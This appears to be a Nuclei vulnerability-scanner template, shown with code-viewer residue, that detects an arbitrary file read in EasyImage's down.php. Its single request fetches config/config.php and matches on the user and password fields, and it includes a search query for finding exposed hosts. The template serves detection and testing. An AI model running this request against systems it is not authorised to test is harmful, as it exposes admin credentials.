38 lines
779 B
YAML
38 lines
779 B
YAML
|
id: easyimage-downphp-lfi
|
||
|
|
||
|
info:
|
||
|
name: EasyImage down.php Arbitrary File Read
|
||
|
author: DhiyaneshDk
|
||
|
severity: high
|
||
|
reference:
|
||
|
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
verified: true
|
||
|
fofa-query: app="EasyImage-简单图床"
|
||
|
tags: easyimage,lfi,exposure,config
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/application/down.php?dw=config/config.php"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "'user'=>"
|
||
|
- "'password'=>"
|
||
|
- "EasyImage"
|
||
|
condition: and
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- 'text/html'
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|